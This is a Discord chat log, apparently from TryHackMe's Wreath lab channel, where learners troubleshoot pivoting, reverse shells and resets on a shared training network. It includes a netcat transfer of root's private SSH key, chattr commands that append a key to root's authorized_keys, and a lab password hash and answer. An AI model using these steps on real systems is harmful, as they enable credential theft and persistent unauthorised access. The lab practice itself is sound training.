You have to download another connection file for wreath network. Once you join the wreath room, go to access, click on network and you will be able to download the connection file. So whenever you want to connect from your box, you will use the new *.ovpn
Hey everyone! I need your help! In Task 20 - Exploitation. I have tried to catch the shell back directly from the root@prod-serv machine. I have opened port 15001 in the firewall, then with a static nc binary, I have started a listener on that port. Then, from my Attack Kali machine, I have 1) Started sshuttle 2) Encoded the reverse shell Powershell payload with the IP:10.200.164.200 (root@prod-serv) and the correct IP (15001), but I can't get my shell back on the root@serv-prod. Does anyone have an idea why? 😄
I'm on task 6 Exploitation. No matter what I do it says the host is unreachable. I checked on the access page and it says I'm connected. I can ping the internal virtual IP address but not 10.200.192.200. I'm not sure what to do?
I also disconnected and reconnected but get the same thing.
And regenerated the VPN
Sheesh, it was stopped. I had extended the time didn't realize it stopped.
your powershell payload there looks to be .150 ip, not .200
ohhh gosh... end of the week... Thanks to jake!
@stoic flicker scam
@icy viper
sorry for tagging both of you, I just suddenly saw Zojja online xD
No worries, thanks
Ok thanks for the ping
Gave +1 Rep to @small sapphire
hello, does the network go to sleep by itself or i have to do something, and when i come back to the room , will the progress ive already done still be there?
If someone resets, your progress will be lost.
You share the network with other people so don't expect to keep your progress
oh
so i have to do it all in one sitting
in order to not lose my progress by anyone
You don't, just get to a point where you can return to or you will have to repeat certain tasks
okay, thanks
Questions answered will stay, but box states will be reset
So keep keys and passwords
👍🏻
the id_rsa key is empty, is that a bug or just someone being an ass and deleting it from the machine?
@merry robin (sorry for ping)
Someone being an ass
welp, guess I am stuck until people vote to reset
hello people of the wreath, someone has accidentally or purposely removed the contents of the ID_RSA file on the webserver, therefore I ask if people can save what they are doing and help get the network reset, that would mean a lot 😄
Remember to state what instance you're on
Disconnect and DM me your config. I can add the key back
Oh sorry it was late for me so I just went to sleep in hopes it got reset over night
Oh yeah, forgot that
the subnet I am on is 10.200.196.x
I got the network reset through voting and it works now
hello,
So i was doing wreath box last night and suddenly i got disconnected
till now i am not able to ping or connect to server
even i voted for reset
if any one can help me with this?
Can someone help me reset the room?
can you help me with this?
just starting this...
When you need to restart wreath as you forgot where you were
Yeah, please everyone vote for a reset. This room seems broken somewhere. I have lost my initial foothold and can't re-do the process to attack with CVE 15107 and get my reverse shell back.😭 🥺
Remember to specify what instance you're on before requesting a reset in this channel
thanks cherrytree
Oh yeah sure. Sorry for that. But now I have 8 votes! So I'm alright. It's gonna reset. Thanks!
Gave +1 Rep to @strange bison
Am I missing something in my curl command? I am able to send my payload with python2 43777.py, but trying with CURL does not work... I'm wondering why. This is something I have already done, but this time it does not work. That's weird. And yes I have changed the script 43777 so for the path to be /web/exploit-amandine.php 🙂 Thanks for help!
-X "uppercase" is important. 🙂 Leaving this error here in case it can help someone else 🙂
Idk what the reason is, I'm unable to connect to the machine using the private key, can anyone help me?
chmod 600 id_rsa
This may work
or try 400
Probably means someone's messed with it and removed the key
any solutions for this ?
i just reset the machine ,still same problem
me too, same issue
Is this a great network for learning pivoting through AD ?
There is precisely zero active directory on Wreath
There's network pivoting though.
Oops must be wrong channel lol
I'm stuck at pivoting to personal comp .100 I've pivoted the first one ie .150 via chisel and proxychains but I'm not able to pivot on .100 using the same methodology.... If someone could explain me what I'm doing maybe in dm would be great help and I could further elaborate my cmds used and what I tried doing to pivot to .100..........
I basically used chisel socks proxy to get to .150 and I access .150 via proxychains but I'm not able to do the same for .100 ......
Hey! I have the same error as you! Sending the payload the response is the Powershell help command. I have URL encoded it though... 
use + rather than %20 as spaces for the powershell command
Thanks for the tip, but I feel that there is something else as I don't get any agents. 
Gave +1 Rep to @oblique oar
hmm are you sure the payload is correct? i don't have vm up atm so ican't check sorry
also are you able to just run a normal command?
yah, a normal command is working so it's something with Empire I guess as I have checked for the firewall port open, checking for the file hierarchy and so on.
Ok got it. The error was in one of my listeners. Thanks for help again 🙂
Gave +1 Rep to @oblique oar
glad you got it sorted :)
@stoic flicker Nitro Scam ^
-ban 402508845815037953 -ddays 1 nitro scam
change your passwords, then appeal.
damnit why is yag not here...
guys can anyone help me why mimikatz not dumping anything ?
is it insufficient privileges ?
In your first command, try it without the tab space
privilege::debug the error starts from there
prolly for the best too
there seems to be an issue with the network. Can anybody confirm that? I cannot reach any of the machines anymore (neither via my machine nor via the attack box)
there are multiple instances of the network so you have to be more specific by mentioning the third octet in the IPs
prod server is on 10.200.187.200
Also verify that the network is actually up and running. It's been far too often that I do a network and it shuts down without me knowing.
network status is running
I think regen-ing the VPN has worked for people in the past. If not, I'm not on that subnet, and I'm not staff, so good luck 👍
nope. Has nothing to do with the VPN. I can ping a machine in the network but not prod-server
but thanks for the help tho
just reset the network and now everything works fine
Hello everyone, I know this is an old question, in my LAN the workstations list are no longer visible but accessible directly(using \pc_name), all connectivity diagnostic are ok (ping, nslookup, access to gateway, domain controller ok, etc.) we have windows 7,8 and 10 and sometimes they appear in the list but most of the time are hidden. Any leads?
Hi, I added in etc/hosts the IP address of the target, and it's working just fine to reach it via http://ip/. Now, although I DO have spawned a shell on the target (and I'm root), I thought I'd get (from the target machine) the id_rsa file (WITHOUT reading its content and copying it into clipboard). What I did was to just raise a simple http.server via Python3. All fine and dandy, but now, when I try to access the file from the attacking machine, although I try using http://ip/id_rsa file, and I've copied the file to the /tmp folder (which is where I've raised the http.server), whenever I try to wget the file from the Kali, I get some error, and the "httpS://NAMEid_rsa" unreachable. Does it make sense? Why is it happening? is there a way to force the damn thing to go where I want it? Also, I've already tried to remove the entry from /etc/hosts file; without success
Are you trying wget https://...? (HTTPS and not HTTP)
Also, are you using the correct port for your http.server (default: 8000)?
mnope, tried wget via http, as I've spawned an http server via python3 -m http.server
although in the hosts file, I've added an entry for the machine
I can show you some print screens
But you didn't specify the port number, did you?
wget http://<host>:<port>/id_rsa
127.0.0.1 localhost
127.0.1.1 kali
10.200.193.200 thomaswreath.thm
I tried with/without a port
and for some reason, wget AUTOMATICALLY tries to dld the https://thomaswreath.thmid_rsa
You gotta verify yourself first to share an image
!docs verify
instead of getting the http://10.200.193.200/id_rsa
You aren't specifying the port number here
By default, wget would use 80 for HTTP and 443 for HTTPS
You could use netcat to transfer the private key
# on the target machine
nc -nvlp 15001 < id_rsa
# on your system
nc thomaswreath.thm 15001 > id_rsa
Hello everyone, I know this is an old question, in my LAN the workstations list are no longer visible but accessible directly(using \pc_name), all connectivity diagnostic are ok (ping, nslookup, access to gateway, domain controller ok, etc.) we have windows 7,8 and 10 and sometimes they appear in the list but most of the time are hidden. Any leads?
You may ask this in #infosec-general
This channel is for the wreath room😄
Hello everyone, I have a bit of problems here accessing the wreath network. May I ask it here or in the tech-support channel ?
You may ask here🙂
Yeah, idk if this is just me or the machine is actually down. I tried pinging it but it said unreachable
Is it running?
Yes, it is running
and I've connected with the vpn
however i could ping the openvpn server
Was it working before or is that from the start?
yep, It was working before
I can't help with that then, you can wait for someone to help you troubleshoot it😄
Yeah, np. I think I need tech support for this one, idk.
It's working now, maybe someone or something was just able to make it work again.
Oh yeah I have a question for this one. Could socat be used in the wreath prod-serv ? I found that there's a missing lib in the prod-serv.
Nvm, I just realized I was using a non-static binary one.
Successfully finished the network. Thank you for creating it @merry robin
Gave +1 Rep to @merry robin
Hi, I got in the web server but when I ping the rest of the network from the server, I only see the AWS gateway and the OpenVPN server. Am I missing something?
WDYM by the rest of the network, git-serv and wreath-pc?
If so, those are Windows machines and may not respond to PING by default
@stoic flicker Scam ^
Hey, does anyone know why the wreath server does not show up in access even though I joined the wreath room?
It is funny that someone would try to scam people on tryhackme server
-ban 325027101415833601 -ddays 1 Nitro Scam -- Compromised Account
🔨 Banned 325027101415833601 indefinitely
Got it. Thanks infloop!
Gave +1 Rep to @lusty saffron
Hello people. Is anyone having this kind of redirection when exploiting the git serv ?
Nvm, I put the wrong address there 😊
I have troubles with Wreath room, already posted a comment in room bugs. Can somebody please reset id_rsa key and http server, because somebody removed SSH access and probably stopped web server instance on lower and higher port? This is very annoying and I would appreciate help!
Or please vote a reset for me. Thanks
You need to specify the subnet that you're in
10.200.196.X
I was wondering why my multi/launcher stager didn't work. I kept using 100.200.... for the last 24 hours
I also have troubles with the id_rsa key
It throws the following error when I try to ssh the IP:
Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
I have the private key and have also run chmod 600 id_rsa but still nothing. Any help would be appreciated.
I am having the same issue in the LFI room. Have you had any luck?
Yap. It worked when I did everything afresh. I restarted the open vpn service and then logged into the machine to grab the ssh keys again. Then boom! I just gained access through the ssh keys. Can't tell you specifically where the problem was. Sorry.
Perhaps inconsistent port was used ? Or your port forwarding wasn't running ?
he used 100.xxx.xxx.xxx instead of 10.xxx.xxx.xxx.
I made that too
Ah, how obvious
empty id_rsa on webserver machine.. wp guys, can we reset the machine?
+1
Or if someone on the network has the private key they could copy it back to the machine
need +2 resets
Sure i could copy it
People who have completed the wreath network, I have a question about clearing logs. Is it necessary to clear the logs or could they be left untouched ?
You don't have to clear any logs
Remember that resetting the network reverts the VMs back to their clean fresh states
Hi I can’t reach the web server (57.200) but able to ping 57.250. Do we need a reset?
I‘m on .100 but the service with the unquoted service path isnt there anymore…
Apparently theres a cleanup script running on the machine but it doesnt actually fix that the service is broken
Yeah, the cleanup script just removes payloads. It should also be restarting the service though, unless someone removed either the script or the service
Go for a reset @surreal sail, and if you figure out who's screwing with it lemme know -- I can remove their access 🙂
Anyone got problems with using CVE_2019_15107.py? It outputs Failed to connect to https://10.200.193.200:10000/ idk why. I am connected to vpn and i can browse the website.
Are you connected using the Wreath's VPN config file or the regular one?
I created a user that is part of the Administrators and Remote Management Users group on git-serv. But when I login remotely using Evil-winrm, I’m not getting admin privileges. Is there a setting on git-serv that is restricting admin privileges in remote sessions? I’m not able to replicate this in my home machine.
Powershell remoting commands are run in a medium integrity process (I.e. as a regular user) -- which is one of the reasons you're told to use RDP for Mimikatz. If you find a workaround for that, please let me know!
Hmm….in my home VM, I’m able to maintain admin privileges when I remote in
hey, are you trying to add windows firewall rule?
Yeah need to open up a port to pivot to the pc. I can do it in a RDP session, just wondering if I can do the same in WinRM
Yes had the same problem about half an hour ago ... just try to login with administrator user in evil-winrm. That worked for me
but don't know why because the users had the same rights
E: Unable to locate package powershell-empire
E: Unable to locate package starkiller
Is that normal ?
it seems i can't get the packages from apt
Ok, nvm i just found that we can only get it from the git repo on ubuntu
just tried evil-winrm using administrator's hash and got admin privileges as well.
just tried logging in using the hash for the user i created. No luck.
Why use the hash if you know the password? 🤔
there's something special about the default Administrator account
for some reason when i login using winrm, I dont have admin privilege even though the account is in the Administrators group
but when i login using the Administrator account, i get admin privileges
And you ran both of these for the account you made?
net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add
yes
When you're in with winrm on the account you created, can you see yourself in the groups using whoami /groups?
yes
then I genuinely have no clue
might be integrity of the process, but I don't know beyond that
ok no worries, I'll move on. Thanks.
Maybe it's because of the UAC of Windows because when you use local Administrator account there is normally no UAC but when you use an account created by you with administrative rights there will come the UAC
i am using Wreath's VPN, today it was working at first but now it's happening again
I don’t think that’s it. Works on a local account I created at home. Have you gotten past the AV on the PC? I tried uploading netcat from the GitHub link couple days ago and looked like it was blocked. I was planning to obfuscate a php reverse shell for windows but haven’t had a chance to try yet.
I'm not so far yet haha have not so much time at moment :/
Can someone help me with downloading a directory with Evil-winrm? i use download name_of_directory it says Download successful but there is nothing on my local machine
Ahhh got it 😅
@strange bison Discord Nitro^
Sorry no mods were online😅
Is it possible that windows defender blocked my IP because I ran a script on the machine that was caught by windows defender?
I don't think it blocks IPs.
since i ran an msfvenom exploit on the machine yesterday, i'm unable to get a connection to the machine
Yeah, later in the room; it is mentioned that Windows Defender will prevent exploits with known signatures and metasploit, with no doubt, should be blocked by it.
Isn't it mentioned to build your own nc.exe program?
There may not be exact same words, but it is mentioned😅
nc.exe didn't work for me. nc64.exe worked
I cant access the wreath network at all.
There is no way to start the lab
Its not coming up in my networks tab
Any ideas?
i dont have a button to start the network
Try leaving and joining the room back
Someone killed the ssh access to 10.200.101.200. If I leave the room and join again I get back in the same room. Any ideas?
Hi guys
I need some help.....I am trying to get from the "prod-server" to the "git-server"
Started listener on "prod-server" but when running the powershell cmd to get a reverse shell from the "git-server" nothing happens.
If I run "whoami" on the "git-server" I get an answer.
Probably the powershell cmd is not working?
Or anything else that I am doing wrong?
maybe something is filtering packets?
is that port even open?
Scam? 🤔
@humble jewel done
thanks
Thank you guys for the support. It is working now as it should.
YOU GOT THIS!
Is there a private network for subscription? If not there should be.
If you want your own network, you can get it:
#wreath-network message
That ain't part of the subscription though, and will almost certainly cost a fair chunk. These networks are not cheap to run which is why they're shared in the first place 🤷♂️
Thank you! I ask because we are using this specific room for a homework assignment and there is a deadline. Several of us are having a tough time with technical difficulties such as certain elements of the network not being available. Sometimes the wait time for a reset can be upwards of 3 hours. I will pass this on to the group and go from there.
Bear in mind that (especially with a group), you can each press reset once per hour, so that may speed things up a bit 🙂
If people are breaking stuff and you can identify who it is, let me know and I can kick 'em out of the room -- shared environments are no place for trolls 🤷♂️
Other than that there isn't a lot I can do about it personally, I'm afraid -- I still don't have a management console for it. If it's a recurring problem, maybe suggest to your school that they reach out to (probably) education@tryhackme.com to get some dedicated instances of the network created 🙂
Heard and I appreciate it! That's fantastic. One of the biggest problems we're having is mostly a timing issue. We all have pretty obnoxiously disjointed schedules and have a hard time collaborating to get it reset
Someone or some people are clearly intentionally attacking the network, it's been constantly down over the last two days. Super frustrating. Never enough people active to create a reset.
can someone explain sshuttle to me? It's requesting the password even though I'm supplying the private key
no issues when using ssh normally
It's wanting your local password
Run it with sudo
okay it's working now but also adds
Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.
nvm it's still working I'll diagnose that error later
@merry robin had a few hiccups along the way, but overall great room/network! I learned a ton
the git server on the 10.200.73 network is down for me. sitting at 6/8 for a reset currently
i'm still not able to access the git server on the 10.200.73. network even after a reset. anyone else having the same issue?
I'm not able to get access through ssh. After resetting the network I'm facing the same problem. What should I do?
checked again today and the git server is still down. i'm on task 33 and can't access the git server with evil winrm or ssh. it's not even responding to pings and this is after a reset
It might not respond to the pings because it's a Windows system
Three machines-
- .200 - prod-serv -> CentOS (Linux)
- .150 - git-serv -> Windows
- .100 - wreath-pc -> Windows
Also, it won't be accessible from your system. If that's what you're trying
i'm pretty sure it was responding to them when it was accessible 3 days ago, but i could be wrong
i've tried using my own vm and the attack box
i can't ssh into anymore from either machine
It will be accessible from the prod-serv, is that too not accessible?
it is. do i have to run evil-winrm from the prod server to get into the git server?
gotchu. i'll give it another shot
i forgot to start up sshuttle. smooth brain on overload. thanks for the help @lusty saffron
Gave +1 Rep to @lusty saffron
I need help, the prod-server doesn't respond. While i was setting up empire the server "crashed", or at least it doesn't respond to pings now, all ssh connections got disconnected. I can't do anything but wait because nobody is voting to reset. What should i do?
The server status is also running
You can add a vote for a reset every hour
Yeah i already voted but thanks
Gave +1 Rep to @strange bison
Yes, but you can add another one every hour. It will add up.
Ok thx
Make sure the port is free, there isn’t another listener by the same name and that the IP is your actual machine’s IP.
I already tried different ports and in the room they are using the ip of the compromised linux server
What type of shell is it? Can you test it with your IP?
If i try my vpn ip it shows the same error
Are you using attackbox or a vm?
Im using a usb-booted version of parrot os
Everything works fine i tried other listeners too which worked
But if i try to use this one it throws an error
parrot on top, also, try resetting your vm or resetting empire-server.
haha
Ok i will try that
I think i have found the problem
I thought this was a special listener format but its just the name of a listener thats already there
But thx for the help
Gave +1 Rep to @small sapphire
Oh haha.
Np!
Same as you, unstable ssh connection / it doesn’t respond to ping some time. I have voted for a reset
hi all
is there something up with the wreath network?
unable to ping .150 git-srv
That's a Windows machine, won't respond to ping by default
EDIT: This isn't correct, please read below
Do you know why?
I suspect git server should be pingable from the webserver
Because for default configurations they don't send any reply to the ICMP ECHO requests, right?
Sorry, if that's incorrect regarding the wreath network
I think, I told the same to one more user earlier😅
There's more to it than that, and that's what matters.
Do you understand Zoned Firewalls? Windows blocks ICMP from the public zone. The VPN traffic is regarded as public zone. Traffic between machines will be private/home/whatever, doesn't block ICMP there.
It's not just incorrect regarding wreath, it's a nuance that matters all over THM and beyond.
Yeah, I know about that. Windows Firewall blocking it, I was reading it now 😅
hi all
trying to access pages on .100
ive got sshuttle and a chisel forward tunnel going
i'm finding that accessing .100 is taking a really long time
I understand a double pivot will never be fast, but any ideas on speeding things up?
@buoyant flume
Just finished Wreath
Amazing network, learnt a tonne
Was wondering if THM has anything else that's similar?
It's a lot different, holo is rated hard and focuses on AD :)
no clicky
-ban 230063922810585088 -ddays 1 nitro discord scam spam. in case account was compromised, appeal the THM ban at bans@tryhackme.com
🔨 Banned Pol#3188 indefinitely
-ban @surreal sail -ddays 1 nitro discord scam spam. in case account was compromised, appeal the THM ban at bans@tryhackme.com
🔨 Banned mhaamahdhi#9206 indefinitely
hi all, i have a 7day badge and am a prem user how come under access in my profile i cant see anything in network?
Haha just figured it out
@static elk
Hello !
I lost the connection with machines, I tried to ping *.73.200 but every packet is lost (host unreachable). I have regenerated the vpn configuration but nothing works
Hi not sure if anybody else is having problems with task 20....When I forward the port of gitstack so I can access it via localhost I can get a connection, but within 20 seconds I get broken pipe errors. Reconnected VPN, rebooted my kali box (bare metal not a VM) and no go.
Hello, does anyone have id_rsa key to host 10.200.x.200? Because someone replaced it with this html site:
cat /root/.ssh/id_rsa
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://thomaswreath.thmroot/.ssh/id_rsa">here</a>.</p>
</body></html>
I have this problem second day in row. Tried vote to reset a box, without luck. I'm at task 18 and now really need to have working ssh 😄 not just stabilised shell.
Apologies to everyone else for the wall of text.
@strange robin Thank You 😉 You can delete your message 🙂
Gave +1 Rep to @strange robin
Problem solved! Thanks Akward
Hi is anyone working on the box? I am on the very 1st step. Accessing the webpage doesn't seem to be possible: try Ip and domain name
The network reset earlier but it seems like everything has gone down again. Not sure if this is overloaded or not, but I can't do anything now. .200 is down along with the other host that will be next for you...
Going to give up and work on something else for now
it's a pity. It takes 8 votes to reset the machine.
I will not be able to work on it to prep for my upcoming exam
@errant harbor @late lodge Remember that there are several instances of Wreath. Problems in one do not reflect in others - saying it's reset isn't applicable to the other instances
how do I access other instances?
You don't.
I'm pointing it out because saying "the box" or "the network" for a reset, especially asking for resets, isn't so helpful.
Strange. I am having trouble nmapping both wreath and throwback. Ports that I know are open shows filtered
That points towards VPN issues IMO
Going a little crazy over here on Task 22, question "What is Thomas' password?"
The NTLM hash decodes to "i<3ruby", the official walkthrough video shows the password is "i<3ruby", but when I enter that into the answer box, it tells me I'm wrong. Anyone have any idea what I'm missing?
check the exact spelling or let the terminal put it in your clipboard.
I appreciate the advice! Unfortunately, I'm copy/pasting straight from CrackStation (with the hash 02d90eda8f6b6b06c32d5f207831101f). I've tried a few variations, including capitalizations, and nothing is being accepted.
Are you answering a task, or trying to login?
Answering a task! Specifically, Task 21 question "What is Thomas' password?"
AH, I was getting confused as you originally said Task 22
Maybe a bug, as i can't put the password in either, and the hash is correct.
Whoops! Thanks for the correction on the task. And thank you for taking the time to look at it. Honestly, it's just nice to know I'm not crazy over here 🙂
Gave +1 Rep to @vital relic
Is it not letting you put this in?
Or me.
*sigh*
Betcha they re-introduced the XSS filtering that blocks the < in it
@fair breach could you raise this internally please? <3
Thanks @merry robin ! I felt crazy this morning, but I'm glad to hear this might not be a me thing.
Gave +1 Rep to @merry robin
I thought I would try it without the i,<,3 (one at a time) to see if answer tolerance would kick in.
@barren wren ⬆️ probably a scam message above(who is shadow joking... obviously a scam)
@steady isle
Not just me then 🙂
Thanks @merry robin learnt a ton of stuff along the way, just need the task 21 "Thomas Password" question sorting to complete.
Gave +1 Rep to @merry robin
See if the user has re-used their password in multiple places
I know the answer, it's an XSS filter blocking the < character I think for the tasks answer box
The answer is correct, but it's not working.
I got it, issue with <> in the answers
This also happened in windows forensics 3 where an answer was "<answer>"
Just completed Wreath, it was very fun.
I have one question regarding the network, in Task 41 it is suggested to upload netcat to c\windows\temp, however when I tried to do this I couldn't (but ||both web uploads dir and user's Temp|| worked), anyone else encountered this?
Could you try now?
Or @surreal sail -- either of you
That worked now.
Perfect
Yep sorted cheers
I need some help. In the task on downloading website.git I tried on evil-winrm and it shows successful, but on my machine I am not able to see it. I referred to a few blogs, though still unlucky
Idk if this is your problem but afaik evil-winrm doesnt allow for relative paths in the download & upload command. I always forget that then when i try downloading things get the same behaviour that ur mentioning.
anybody else having issues with sshuttle and --ssh-cmd "ssh -i id_rsa" ?
I figured out where I was going wrong. apparently sshuttle has to be run as root
hi all!
anybody have access to lab? I haven't access today. Tomorrow every thing is normal. who knows what is a problem?
Hi,
I'm trying to move the system.bak file but I'm getting "An unexpected network error occured". Any help? please 🥺
hello , anyone starting it from start . need to collab with me ?? i will start it from today. please DM it will help me a lot
Not really starting from start but I could help you if you need it.
that will be very nice . thanks ,
Gave +1 Rep to @humble jewel
Hey all just started wreath today, working on exploiting the webserver and I keep getting this python error, has anyone else experienced this error at this point in the network? Trying to determine if its like an issue with my kali or just maybe the tool being used
The exploit just kinda freezes out on me when I try to upgrade from the pseudoshell into full reverse shell.
Seems like this above SS is an issue with my pyenv..dang
In which directory are you running this exploit script?
Created my own directory to run it from
Just like Desktop/wreath/exploit
It seems it doesn't have access to create a file - commands.txt in the directory it is started from
Right right, alright maybe I'll run it from a different directory, I even tried running it as sudo earlier and it didn't work but let me try again
Yup, ofc running it as sudo this time around works lol, ty for pointing that out
You shouldn't run a public exploit script or code with sudo
It may not be safe. Although this one is provided by the room creator, Muiri
Yes of course good point haha
So another QQ, Im trying to pull the root users password hash out for task6 but the hash I am looking at in etc/shadow very clearly doesnt match the format they want in the task/question or even in the walkthrough?
Is it possible someone changed the password? Kinda looks like that is the case...
seems like it. It happens a lot that someone messes with stuff.
-ban @surreal sail -ddays 1 Nitro Scam.
🔨 Banned *Joker#8879 indefinitely
Darn that's frustrating
Hi i need help with wreath openvpn file, it gives 404 error
Hello i am getting this error when i try to connect to the prod server with the id_rsa file its my second time playing this room and the first time it worked lol
can you share the key's contents with cat id_rsa
too big had to share it as a file
Hmm, I tried it and it gave the same result, try to get this key again if it was corrupted in any way otherwise it might just have been removed by someone, in which case go for a network reset
yeah its curr 0/8 will take some time
would it be possible to overwrite the id_rsa key
others could still use it
no, I've been told it's best to keep it unchanged
simply, go for a reset, I think you can vote every one or two hours
They could append their own id_rsa.pub's content into /root/.ssh/authorized_keys
Ok thx :)
yeh, I think they advise not to mess with keys to prevent issues for others 
I said to __append__😅
I know, but still users can mess up 🙂
im not able to modify the authorized_keys file
Because you don't have a tty, nano requires it to find the terminal width and height
yeah but >> didnt work too
You can cat screamz_rsa.pub >> authorized_keys (make sure to append, >>)
You can remove that bit 😅
how?
risky
||```bash
chattr -i authorized_keys
cat screamz_rsa.pub >> authorized_keys
chattr +i authorized_keys
```||
Check if your key works now
If a bad user messed up with id_rsa, then why can't the good user correct the other thing😄
¯_(ツ)_/¯
its still saying bad format
whats the syntax to upload with scp again
it might work like this
screamz_rsa, this time?
yes
What's showing bad format?
when i try to load the key using the -i flag at the ssh connect
the id_rsa is just the old name
its the new key
But wait, how will you scp?
Just run a http.server and wget your private key
Make sure to use a port > 15000
Don't run ssh service on your host
yeah im such a dumbass why didn't i think about that
yeah would only be quick
